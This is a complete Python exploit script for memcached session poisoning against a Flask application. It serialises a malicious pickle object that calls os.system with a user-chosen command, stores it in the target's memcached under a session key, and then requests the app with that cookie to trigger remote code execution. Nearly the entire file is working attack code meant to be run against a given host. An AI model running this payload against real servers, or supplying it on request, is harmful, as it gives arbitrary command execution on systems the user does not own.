import pickle
import argparse
import os
import requests
import pyfiglet
from pymemcache.client import base

parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help="Target Machine Ip Address", type=str, required=True)
parser.add_argument("--rport", help="Python Flask App Port", type=int, default=5000)
parser.add_argument("--cmd", help="Command to get executed on the target machine", type=str, required=True)
parser.add_argument("--cookie", help="Your ACTUAL SESSION COOKIE from the VULNERABLE FLASK Application. Example: \"session:3e8234e1-6c89-4ac2-be53-20574edcbcaa\"", type=str, required=True)
args = parser.parse_args()

cmd = args.cmd
rhost = args.rhost
rport = args.rport
cookie = args.cookie

class rce_payload:
    def __reduce__(self):
        return (os.system, (cmd,))
        
def pickle_ser():
    pickled = pickle.dumps(rce_payload()) #Serializing the payload
    client = base.Client((rhost, 11211)) #Connecting to the memcached service.
    client.set(cookie, pickled)
    
def exploit_trigger():
    cookie_dict = dict(cookie.split(":") for item in cookie)
    r = requests.get(url = f"http://{rhost}:{rport}",cookies=cookie_dict)
    if (r.status_code == 200):
    	print("Sucess!")
    elif (r.status_code == 404):
    	print("Not Found!")
    	
if __name__ == '__main__':
    ascii_banner = pyfiglet.figlet_format("PICKLE - MEMCACHED \n POISONING \n")
    print(ascii_banner)
    
    pickle_ser()
    exploit_trigger()